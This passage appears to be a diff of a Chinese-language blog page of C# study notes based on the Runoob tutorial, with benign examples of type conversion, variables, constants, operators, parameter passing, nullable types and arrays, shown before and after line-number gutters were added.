                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            19
                            20
                            using System;

                            namespace TypeConversionApplication
                            {
                            class StringConversion
                            {
                            static void Main(string[] args)
                            {
                            int i = 75;
                            float f = 53.005f;
                            double d = 2345.7652;
                            bool b = true;
                            Console.WriteLine(i.ToString());
                            Console.WriteLine(f.ToString());
                            Console.WriteLine(d.ToString());
                            Console.WriteLine(b.ToString());
                            Console.ReadKey();
                            }
                            }
                            }

                            使用 Parse 方法

                            ​ Parse 方法用于将字符串转换为对应的数值类型,如果转换失败会抛出异常。

                            -
                            string str = "123.45";
                            double d = double.Parse(str);
                            +
                            1
                            2
                            string str = "123.45";
                            double d = double.Parse(str);

                            使用 TryParse 方法

                            ​ TryParse 方法类似于 Parse,但它不会抛出异常,而是返回一个布尔值指示转换是否成功。

                            -
                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            string str = "123.45";
                            double d;
                            bool success = double.TryParse(str, out d);

                            if (success)
                            {
                            Console.WriteLine("转换成功: " + d);
                            }
                            else
                            {
                            Console.WriteLine("转换失败");
                            }

                            int i;
                            success = int.TryParse(str, out i);

                            if (success)
                            {
                            Console.WriteLine("转换成功: " + i);
                            }
                            else
                            {
                            Console.WriteLine("转换失败");
                            }

                            Console.ReadKey();
                            }
                            }
                            }
                            -
                            转换成功: 123.45
                            转换失败
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            19
                            20
                            21
                            22
                            23
                            24
                            25
                            26
                            27
                            28
                            29
                            30
                            31
                            32
                            33
                            34
                            35
                            36
                            37
                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            string str = "123.45";
                            double d;
                            bool success = double.TryParse(str, out d);

                            if (success)
                            {
                            Console.WriteLine("转换成功: " + d);
                            }
                            else
                            {
                            Console.WriteLine("转换失败");
                            }

                            int i;
                            success = int.TryParse(str, out i);

                            if (success)
                            {
                            Console.WriteLine("转换成功: " + i);
                            }
                            else
                            {
                            Console.WriteLine("转换失败");
                            }

                            Console.ReadKey();
                            }
                            }
                            }
                            +
                            1
                            2
                            转换成功: 123.45
                            转换失败

                            自定义类型转换

                            ​ C# 还允许你定义自定义类型转换操作,通过在类型中定义 implicitexplicit 关键字。

                            -
                            using System;

                            public class Fahrenheit
                            {
                            public double Degrees { get; set; }

                            public Fahrenheit(double degrees)
                            {
                            Degrees = degrees;
                            }

                            // 隐式转换从华氏温度转为摄氏温度
                            public static implicit operator Celsius(Fahrenheit f)
                            {
                            return new Celsius((f.Degrees - 32) / 1.8);
                            }

                            // 显式转换从摄氏温度转为华氏温度
                            public static explicit operator Fahrenheit(Celsius c)
                            {
                            return new Fahrenheit(32 + c.Degrees * 1.8);
                            }
                            }

                            public class Celsius
                            {
                            public double Degrees { get; set; }

                            public Celsius(double degrees)
                            {
                            Degrees = degrees;
                            }
                            }

                            public class Program
                            {
                            public static void Main()
                            {
                            Celsius c = new Celsius(37);
                            Fahrenheit f = new Fahrenheit(98.6);
                            Celsius c2 = f; // 使用隐式转换
                            Fahrenheit f2 = (Fahrenheit)c; // 使用显式转换

                            Console.WriteLine(c.Degrees + "°C");
                            Console.WriteLine(f.Degrees + "°F");
                            Console.WriteLine(c2.Degrees + "°C");
                            Console.WriteLine(f2.Degrees + "°F");

                            Console.ReadKey();
                            }
                            }
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            19
                            20
                            21
                            22
                            23
                            24
                            25
                            26
                            27
                            28
                            29
                            30
                            31
                            32
                            33
                            34
                            35
                            36
                            37
                            38
                            39
                            40
                            41
                            42
                            43
                            44
                            45
                            46
                            47
                            48
                            49
                            50
                            51
                            using System;

                            public class Fahrenheit
                            {
                            public double Degrees { get; set; }

                            public Fahrenheit(double degrees)
                            {
                            Degrees = degrees;
                            }

                            // 隐式转换从华氏温度转为摄氏温度
                            public static implicit operator Celsius(Fahrenheit f)
                            {
                            return new Celsius((f.Degrees - 32) / 1.8);
                            }

                            // 显式转换从摄氏温度转为华氏温度
                            public static explicit operator Fahrenheit(Celsius c)
                            {
                            return new Fahrenheit(32 + c.Degrees * 1.8);
                            }
                            }

                            public class Celsius
                            {
                            public double Degrees { get; set; }

                            public Celsius(double degrees)
                            {
                            Degrees = degrees;
                            }
                            }

                            public class Program
                            {
                            public static void Main()
                            {
                            Celsius c = new Celsius(37);
                            Fahrenheit f = new Fahrenheit(98.6);
                            Celsius c2 = f; // 使用隐式转换
                            Fahrenheit f2 = (Fahrenheit)c; // 使用显式转换

                            Console.WriteLine(c.Degrees + "°C");
                            Console.WriteLine(f.Degrees + "°F");
                            Console.WriteLine(c2.Degrees + "°C");
                            Console.WriteLine(f2.Degrees + "°F");

                            Console.ReadKey();
                            }
                            }

                            implicit 定义隐式转换。

                            explicit 定义显示转换。

                            operator 关键字的主要作用是用来重载运算符的,还可以用于类或结构中类型的自定义转换。

                            -
                            37°C
                            98.6°F
                            37°C
                            98.6°F
                            +
                            1
                            2
                            3
                            4
                            37°C
                            98.6°F
                            37°C
                            98.6°F

                            C# 变量

                            ​ 一个变量只不过是一个供程序操作的存储区的名字

                            C# 中的变量定义

                            @@ -553,11 +551,11 @@

                            C# 中的变量初始化

                            ​ 正确地初始化变量是一个良好的编程习惯,否则有时程序会产生意想不到的结果。

                            -
                            using System;

                            namespace VariableDefinition
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            short a;
                            int b;
                            double c;

                            /* 实际初始化 */
                            a = 10;
                            b = 20;
                            c = a + b;
                            Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
                            Console.ReadLine();
                            }
                            }
                            }
                            -
                            a = 10, b = 20, c = 30
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            19
                            20
                            21
                            using System;

                            namespace VariableDefinition
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            short a;
                            int b;
                            double c;

                            /* 实际初始化 */
                            a = 10;
                            b = 20;
                            c = a + b;
                            Console.WriteLine("a = {0}, b = {1}, c = {2}", a, b, c);
                            Console.ReadLine();
                            }
                            }
                            }
                            +
                            1
                            a = 10, b = 20, c = 30

                            接受来自用户的值

                            System 命名空间中的 Console 类提供了一个函数 ReadLine(),用于接收来自用户的输入,并把它存储到一个变量中。(类似 scanf()

                            -
                            using System;

                            namespace VariableDefinition
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            int num;
                            num = Convert.ToInt32(Console.ReadLine());
                            Console.WriteLine(num);
                            Console.ReadLine();
                            }
                            }
                            }
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            using System;

                            namespace VariableDefinition
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            int num;
                            num = Convert.ToInt32(Console.ReadLine());
                            Console.WriteLine(num);
                            Console.ReadLine();
                            }
                            }
                            }

                            C# 中的 Lvalues 和 Rvalues

                            ​ C# 中的两种表达式:

                              @@ -565,21 +563,21 @@

                              int g = 20;
                              +
                              1
                              int g = 20;

                              下面是一个无效的语句,会产生编译时错误:

                              -
                              10 = 20;
                              +
                              1
                              10 = 20;

                              C# 变量作用域

                              ​ 在 C# 中,变量的作用域定义了变量的可见性和生命周期。

                              ​ 变量的作用域通常由花括号 {} 定义的代码块来确定

                              方法参数作用域

                              ​ C# 是完全面向对象的语言,因此全局变量最高能只能放在类定义下:

                              -
                              class MyClass
                              {
                              int memberVar = 30; // 成员变量,在整个类中可见
                              }
                              +
                              1
                              2
                              3
                              4
                              class MyClass
                              {
                              int memberVar = 30; // 成员变量,在整个类中可见
                              }

                              静态变量作用域

                              static 静态变量是在类级别上声明的,但它们的作用域也受限于其定义的类。

                              -
                              class MyClass
                              {
                              static int staticVar = 40; // 静态变量,在整个类中可见
                              }
                              +
                              1
                              2
                              3
                              4
                              class MyClass
                              {
                              static int staticVar = 40; // 静态变量,在整个类中可见
                              }

                              循环变量作用域

                              ​ 在 for 循环中声明的循环变量在循环体内可见。

                              -
                              for (int i = 0; i < 5; i++)
                              {
                              // i 在循环体内可见
                              }
                              // i 在这里不可见
                              +
                              1
                              2
                              3
                              4
                              5
                              for (int i = 0; i < 5; i++)
                              {
                              // i 在循环体内可见
                              }
                              // i 在这里不可见

                              ​ 总体而言,变量的作用域有助于管理变量的可见性和生命周期,确保变量在其有效范围内使用,也有助于防止命名冲突。

                              C# 常量

                                @@ -601,16 +599,16 @@

                                后缀可以是大写或者小写,多个后缀以任意顺序进行组合。

                              -
                              using System;

                              namespace VariableDefinition
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              var num = 0xFeeL;
                              Console.WriteLine(num);
                              Console.ReadLine();
                              }
                              }
                              }
                              -
                              4078
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              using System;

                              namespace VariableDefinition
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              var num = 0xFeeL;
                              Console.WriteLine(num);
                              Console.ReadLine();
                              }
                              }
                              }
                              +
                              1
                              4078

                              浮点常量

                              ​ 一个浮点常量是由整数部分、小数点、小数部分和指数部分组成。您可以使用小数形式或者指数形式来表示浮点常量。

                              ​ 原网页认为 314159E-5L 是合法的,然而测试的时候不合法,只有 314159E-5 合法。

                              字符常量

                              -
                              namespace EscapeChar
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              Console.WriteLine("Hello\tWorld\n\n");
                              Console.ReadLine();
                              }
                              }
                              }
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              namespace EscapeChar
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              Console.WriteLine("Hello\tWorld\n\n");
                              Console.ReadLine();
                              }
                              }
                              }

                              ​ 之类的。

                              字符串常量

                              -
                              string a = "hello, world";  // hello, world
                              string b = @"hello, world"; // hello, world
                              string c = "hello \t world"; // hello world
                              string d = @"hello \t world"; // hello \t world
                              string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
                              string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
                              string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
                              string h = @"\\server\share\file.txt"; // \\server\share\file.txt
                              string i = "one\r\ntwo\r\nthree";
                              string j = @"one
                              two
                              three";
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              string a = "hello, world";  // hello, world
                              string b = @"hello, world"; // hello, world
                              string c = "hello \t world"; // hello world
                              string d = @"hello \t world"; // hello \t world
                              string e = "Joe said \"Hello\" to me"; // Joe said "Hello" to me
                              string f = @"Joe said ""Hello"" to me"; // Joe said "Hello" to me
                              string g = "\\\\server\\share\\file.txt"; // \\server\share\file.txt
                              string h = @"\\server\share\file.txt"; // \\server\share\file.txt
                              string i = "one\r\ntwo\r\nthree";
                              string j = @"one
                              two
                              three";

                              ​ 回车(Carriage Return)和换行(Newline)是两个相关但不同的概念,它们通常一起使用来控制文本在显示或存储时的布局和格式。

                                @@ -642,14 +640,14 @@

                                C# 运

                          ​ 基本跟 C/C++ 差不多,记一点没接触过的。

                          is 判断对象是否为某一类型。

                          -
                          using System;

                          namespace VariableDefinition
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          dynamic a = 3.14;
                          Console.WriteLine(a is float);
                          Console.ReadLine();
                          }
                          }
                          }
                          -
                          False
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          using System;

                          namespace VariableDefinition
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          dynamic a = 3.14;
                          Console.WriteLine(a is float);
                          Console.ReadLine();
                          }
                          }
                          }
                          +
                          1
                          False

                          as 强制转换,即使转换失败也不会抛出异常(改为返回 null)。

                          -
                          using System;

                          namespace AsOperatorExample
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          object obj = "This is a string";

                          // Using 'as' operator to cast obj to string
                          string str = obj as string;

                          if (str != null)
                          {
                          Console.WriteLine("The object was successfully cast to a string.");
                          Console.WriteLine(str);
                          }
                          else
                          {
                          Console.WriteLine("The object could not be cast to a string.");
                          }

                          // Attempting to cast obj to an incompatible type
                          obj = 123;
                          str = obj as string;

                          if (str == null)
                          {
                          Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
                          }
                          }
                          }
                          }
                          -
                          The object was successfully cast to a string.
                          This is a string
                          The object could not be cast to a string because it is not a compatible type.
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          15
                          16
                          17
                          18
                          19
                          20
                          21
                          22
                          23
                          24
                          25
                          26
                          27
                          28
                          29
                          30
                          31
                          32
                          33
                          34
                          using System;

                          namespace AsOperatorExample
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          object obj = "This is a string";

                          // Using 'as' operator to cast obj to string
                          string str = obj as string;

                          if (str != null)
                          {
                          Console.WriteLine("The object was successfully cast to a string.");
                          Console.WriteLine(str);
                          }
                          else
                          {
                          Console.WriteLine("The object could not be cast to a string.");
                          }

                          // Attempting to cast obj to an incompatible type
                          obj = 123;
                          str = obj as string;

                          if (str == null)
                          {
                          Console.WriteLine("The object could not be cast to a string because it is not a compatible type.");
                          }
                          }
                          }
                          }
                          +
                          1
                          2
                          3
                          The object was successfully cast to a string.
                          This is a string
                          The object could not be cast to a string because it is not a compatible type.

                          typeof() 返回 class 的类型。

                          -
                          using System;

                          class Program
                          {
                          static void Main(string[] args)
                          {
                          Type type = typeof(string);
                          Console.WriteLine(type.FullName);
                          Console.ReadKey();
                          }
                          }
                          -
                          System.String
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          using System;

                          class Program
                          {
                          static void Main(string[] args)
                          {
                          Type type = typeof(string);
                          Console.WriteLine(type.FullName);
                          Console.ReadKey();
                          }
                          }
                          +
                          1
                          System.String

                          C# 判断

                          ​ C# 定义一个数组:

                          -
                          int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
                          +
                          1
                          int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };

                          ​ C# 定义一个列表:

                          -
                          // 创建一个字符串列表
                          List<string> myStrings = new List<string>();

                          // 向列表添加一些字符串元素
                          myStrings.Add("Google");
                          myStrings.Add("Runoob");
                          myStrings.Add("Taobao");
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          // 创建一个字符串列表
                          List<string> myStrings = new List<string>();

                          // 向列表添加一些字符串元素
                          myStrings.Add("Google");
                          myStrings.Add("Runoob");
                          myStrings.Add("Taobao");

                          ​ 循环语法大都与 C/C++ 一致。试一下之前一直不太熟悉的 foreach

                          -
                          class ForEachTest
                          {
                          static void Main(string[] args)
                          {
                          int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
                          foreach (int element in fibarray)
                          {
                          System.Console.WriteLine(element);
                          }
                          System.Console.WriteLine();

                          // 类似 foreach 循环
                          for (int i = 0; i < fibarray.Length; i++)
                          {
                          System.Console.WriteLine(fibarray[i]);
                          }
                          System.Console.WriteLine();

                          // 设置集合中元素的计算器
                          int count = 0;
                          foreach (int element in fibarray)
                          {
                          count += 1;
                          System.Console.WriteLine("Element #{0}: {1}", count, element);
                          }
                          System.Console.WriteLine("Number of elements in the array: {0}", count);
                          }
                          }
                          -
                          0
                          1
                          1
                          2
                          3
                          5
                          8
                          13

                          0
                          1
                          1
                          2
                          3
                          5
                          8
                          13

                          Element #1: 0
                          Element #2: 1
                          Element #3: 1
                          Element #4: 2
                          Element #5: 3
                          Element #6: 5
                          Element #7: 8
                          Element #8: 13
                          Number of elements in the array: 8
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          15
                          16
                          17
                          18
                          19
                          20
                          21
                          22
                          23
                          24
                          25
                          26
                          27
                          28
                          class ForEachTest
                          {
                          static void Main(string[] args)
                          {
                          int[] fibarray = new int[] { 0, 1, 1, 2, 3, 5, 8, 13 };
                          foreach (int element in fibarray)
                          {
                          System.Console.WriteLine(element);
                          }
                          System.Console.WriteLine();

                          // 类似 foreach 循环
                          for (int i = 0; i < fibarray.Length; i++)
                          {
                          System.Console.WriteLine(fibarray[i]);
                          }
                          System.Console.WriteLine();

                          // 设置集合中元素的计算器
                          int count = 0;
                          foreach (int element in fibarray)
                          {
                          count += 1;
                          System.Console.WriteLine("Element #{0}: {1}", count, element);
                          }
                          System.Console.WriteLine("Number of elements in the array: {0}", count);
                          }
                          }
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          15
                          16
                          17
                          18
                          19
                          20
                          21
                          22
                          23
                          24
                          25
                          26
                          27
                          0
                          1
                          1
                          2
                          3
                          5
                          8
                          13

                          0
                          1
                          1
                          2
                          3
                          5
                          8
                          13

                          Element #1: 0
                          Element #2: 1
                          Element #3: 1
                          Element #4: 2
                          Element #5: 3
                          Element #6: 5
                          Element #7: 8
                          Element #8: 13
                          Number of elements in the array: 8

                          C# 封装

                          • C# 封装 | 菜鸟教程 (runoob.com)
                          • @@ -707,7 +705,7 @@

                            C# 方法

                            -
                            <Access Specifier> <Return Type> <Method Name>(Parameter List)
                            {
                            Method Body
                            }
                            +
                            1
                            2
                            3
                            4
                            <Access Specifier> <Return Type> <Method Name>(Parameter List)
                            {
                            Method Body
                            }
                            • Access Specifier:访问修饰符,这个决定了变量或方法对于另一个类的可见性。
                            • Return type:返回类型,一个方法可以返回一个值。返回类型是方法返回的值的数据类型。如果方法不返回任何值,则返回类型为 void
                            • @@ -718,49 +716,49 @@

                              C# 方法

                              按值传递参数

                              ​ 这是参数传递的默认方式。在这种方式下,当调用一个方法时,会为每个值参数创建一个新的存储位置。

                              ​ 实际参数的值会复制给形参,实参形参使用的是两个不同内存中的值。所以,当形参的值发生改变时,不会影响实参的值,从而保证了实参数据的安全。下面的实例演示了这个概念:

                              -
                              using System;
                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void swap(int x, int y)
                              {
                              int temp;

                              temp = x; /* 保存 x 的值 */
                              x = y; /* 把 y 赋值给 x */
                              y = temp; /* 把 temp 赋值给 y */
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;
                              int b = 200;

                              Console.WriteLine("在交换之前,a 的值: {0}", a);
                              Console.WriteLine("在交换之前,b 的值: {0}", b);

                              /* 调用函数来交换值 */
                              n.swap(a, b);

                              Console.WriteLine("在交换之后,a 的值: {0}", a);
                              Console.WriteLine("在交换之后,b 的值: {0}", b);

                              Console.ReadLine();
                              }
                              }
                              }
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              using System;
                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void swap(int x, int y)
                              {
                              int temp;

                              temp = x; /* 保存 x 的值 */
                              x = y; /* 把 y 赋值给 x */
                              y = temp; /* 把 temp 赋值给 y */
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;
                              int b = 200;

                              Console.WriteLine("在交换之前,a 的值: {0}", a);
                              Console.WriteLine("在交换之前,b 的值: {0}", b);

                              /* 调用函数来交换值 */
                              n.swap(a, b);

                              Console.WriteLine("在交换之后,a 的值: {0}", a);
                              Console.WriteLine("在交换之后,b 的值: {0}", b);

                              Console.ReadLine();
                              }
                              }
                              }

                              ​ 当上面的代码被编译和执行时,它会产生下列结果:

                              -
                              在交换之前,a 的值: 100
                              在交换之前,b 的值: 200
                              在交换之后,a 的值: 100
                              在交换之后,b 的值: 200
                              +
                              1
                              2
                              3
                              4
                              在交换之前,a 的值: 100
                              在交换之前,b 的值: 200
                              在交换之后,a 的值: 100
                              在交换之后,b 的值: 200

                              ​ a 与 b 交换失败。

                              按引用传递参数

                              ​ 引用参数是一个对变量的内存位置的引用。当按引用传递参数时,与值参数不同的是,它不会为这些参数创建一个新的存储位置。引用参数表示与提供给方法的实际参数具有相同的内存位置。

                              ​ 类似于 C/C++ 的指针。

                              ​ 在 C# 中,使用 ref 关键字声明引用参数。下面的实例演示了这点:

                              -
                              using System;
                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void swap(ref int x, ref int y)
                              {
                              int temp;

                              temp = x; /* 保存 x 的值 */
                              x = y; /* 把 y 赋值给 x */
                              y = temp; /* 把 temp 赋值给 y */
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;
                              int b = 200;

                              Console.WriteLine("在交换之前,a 的值: {0}", a);
                              Console.WriteLine("在交换之前,b 的值: {0}", b);

                              /* 调用函数来交换值 */
                              n.swap(ref a, ref b);

                              Console.WriteLine("在交换之后,a 的值: {0}", a);
                              Console.WriteLine("在交换之后,b 的值: {0}", b);

                              Console.ReadLine();

                              }
                              }
                              }
                              -
                              在交换之前,a 的值:100
                              在交换之前,b 的值:200
                              在交换之后,a 的值:200
                              在交换之后,b 的值:100
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              30
                              31
                              32
                              33
                              34
                              35
                              using System;
                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void swap(ref int x, ref int y)
                              {
                              int temp;

                              temp = x; /* 保存 x 的值 */
                              x = y; /* 把 y 赋值给 x */
                              y = temp; /* 把 temp 赋值给 y */
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;
                              int b = 200;

                              Console.WriteLine("在交换之前,a 的值: {0}", a);
                              Console.WriteLine("在交换之前,b 的值: {0}", b);

                              /* 调用函数来交换值 */
                              n.swap(ref a, ref b);

                              Console.WriteLine("在交换之后,a 的值: {0}", a);
                              Console.WriteLine("在交换之后,b 的值: {0}", b);

                              Console.ReadLine();

                              }
                              }
                              }
                              +
                              1
                              2
                              3
                              4
                              在交换之前,a 的值:100
                              在交换之前,b 的值:200
                              在交换之后,a 的值:200
                              在交换之后,b 的值:100

                              按输出传递参数

                              ​ return 语句可用于只从函数中返回一个值。但是,可以使用 输出参数 来从函数中返回多个值。输出参数会把方法输出的数据赋给自己,其他方面与引用参数相似。

                              -
                              using System;

                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void getValue(out int x)
                              {
                              int temp = 5;
                              x = temp;
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;

                              Console.WriteLine("在方法调用之前,a 的值: {0}", a);

                              /* 调用函数来获取值 */
                              n.getValue(out a);

                              Console.WriteLine("在方法调用之后,a 的值: {0}", a);
                              Console.ReadLine();

                              }
                              }
                              }
                              -
                              在方法调用之前,a 的值: 100
                              在方法调用之后,a 的值: 5
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              27
                              28
                              29
                              using System;

                              namespace CalculatorApplication
                              {
                              class NumberManipulator
                              {
                              public void getValue(out int x)
                              {
                              int temp = 5;
                              x = temp;
                              }

                              static void Main(string[] args)
                              {
                              NumberManipulator n = new NumberManipulator();
                              /* 局部变量定义 */
                              int a = 100;

                              Console.WriteLine("在方法调用之前,a 的值: {0}", a);

                              /* 调用函数来获取值 */
                              n.getValue(out a);

                              Console.WriteLine("在方法调用之后,a 的值: {0}", a);
                              Console.ReadLine();

                              }
                              }
                              }
                              +
                              1
                              2
                              在方法调用之前,a 的值: 100
                              在方法调用之后,a 的值: 5

                              C# 可空类型

                              C# 可空类型(Nullable)

                              ? 单问号用于对 int、double、bool 等无法直接赋值为 null 的数据类型进行 null 的赋值,意思是这个数据类型是 Nullable 类型的。

                              -
                              using System;
                              namespace CalculatorApplication
                              {
                              class NullablesAtShow
                              {
                              static void Main(string[] args)
                              {
                              int? num1 = null;
                              int? num2 = 45;
                              double? num3 = new double?();
                              double? num4 = 3.14157;

                              bool? boolval = new bool?();

                              // 显示值

                              Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
                              num1, num2, num3, num4);
                              Console.WriteLine("一个可空的布尔值: {0}", boolval);
                              Console.ReadLine();

                              }
                              }
                              }
                              -
                              显示可空类型的值: , 45, , 3.14157
                              一个可空的布尔值:
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              using System;
                              namespace CalculatorApplication
                              {
                              class NullablesAtShow
                              {
                              static void Main(string[] args)
                              {
                              int? num1 = null;
                              int? num2 = 45;
                              double? num3 = new double?();
                              double? num4 = 3.14157;

                              bool? boolval = new bool?();

                              // 显示值

                              Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
                              num1, num2, num3, num4);
                              Console.WriteLine("一个可空的布尔值: {0}", boolval);
                              Console.ReadLine();

                              }
                              }
                              }
                              +
                              1
                              2
                              显示可空类型的值: , 45, , 3.14157
                              一个可空的布尔值:

                              Null 合并运算符( ?? )

                              ​ Null 合并运算符用于定义可空类型和引用类型的默认值。Null 合并运算符为类型转换定义了一个预设值,以防可空类型的值为 Null

                              -
                              using System;
                              namespace CalculatorApplication
                              {
                              class NullablesAtShow
                              {

                              static void Main(string[] args)
                              {

                              double? num1 = null;
                              double? num2 = 3.14157;
                              double num3;
                              num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
                              Console.WriteLine("num3 的值: {0}", num3);
                              num3 = num2 ?? 5.34;
                              Console.WriteLine("num3 的值: {0}", num3);
                              Console.ReadLine();

                              }
                              }
                              }
                              -
                              num3 的值: 5.34
                              num3 的值: 3.14157
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              using System;
                              namespace CalculatorApplication
                              {
                              class NullablesAtShow
                              {

                              static void Main(string[] args)
                              {

                              double? num1 = null;
                              double? num2 = 3.14157;
                              double num3;
                              num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
                              Console.WriteLine("num3 的值: {0}", num3);
                              num3 = num2 ?? 5.34;
                              Console.WriteLine("num3 的值: {0}", num3);
                              Console.ReadLine();

                              }
                              }
                              }
                              +
                              1
                              2
                              num3 的值: 5.34
                              num3 的值: 3.14157

                              ?? 可以理解为三元运算符的简化形式:

                              -
                              num3 = num1 ?? 5.34;
                              num3 = (num1 == null) ? 5.34 : num1;
                              +
                              1
                              2
                              num3 = num1 ?? 5.34;
                              num3 = (num1 == null) ? 5.34 : num1;

                              C# 数组(Array)

                              -
                              using System;
                              namespace ArrayApplication
                              {
                              class MyArray
                              {
                              static void Main(string[] args)
                              {
                              int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
                              int i, j;


                              /* 初始化数组 n 中的元素 */
                              for (i = 0; i < 10; i++)
                              {
                              n[i] = i + 100;
                              }

                              /* 输出每个数组元素的值 */
                              for (j = 0; j < 10; j++)
                              {
                              Console.WriteLine("Element[{0}] = {1}", j, n[j]);
                              }
                              Console.ReadKey();
                              }
                              }
                              }
                              +
                              1
                              2
                              3
                              4
                              5
                              6
                              7
                              8
                              9
                              10
                              11
                              12
                              13
                              14
                              15
                              16
                              17
                              18
                              19
                              20
                              21
                              22
                              23
                              24
                              25
                              26
                              using System;
                              namespace ArrayApplication
                              {
                              class MyArray
                              {
                              static void Main(string[] args)
                              {
                              int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
                              int i, j;


                              /* 初始化数组 n 中的元素 */
                              for (i = 0; i < 10; i++)
                              {
                              n[i] = i + 100;
                              }

                              /* 输出每个数组元素的值 */
                              for (j = 0; j < 10; j++)
                              {
                              Console.WriteLine("Element[{0}] = {1}", j, n[j]);
                              }
                              Console.ReadKey();
                              }
                              }
                              }

                              ​ 二维数组:

                              -
                              using System;

                              namespace TwoDimensionalArrayExample
                              {
                              class Program
                              {
                              static void Main(string[] args)
                              {
                              // 定义一个3行4列的二维数组
                              int[,] array = new int[3, 4];

                              // 使用嵌套循环来初始化数组元素
                              for (int i = 0; i < 3; i++)
                              {
                              for (int j = 0; j < 4; j++)
                              {
                              array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
                              }
                              }

                              /* 也可直接初始化:
                              int[,] array =
                              {
                              { 1, 2, 3, 4 },
                              { 5, 6, 7, 8 },
                              { 9, 10, 11, 12 }
                              };
                              */

                              // 打印数组元素
                              for (int i = 0; i < 3; i++)
                              {
                              for (int j = 0; j < 4; j++)
                              {
                              Console.Write(array[i, j] + "\t");
                              }
                              Console.WriteLine();
                              }
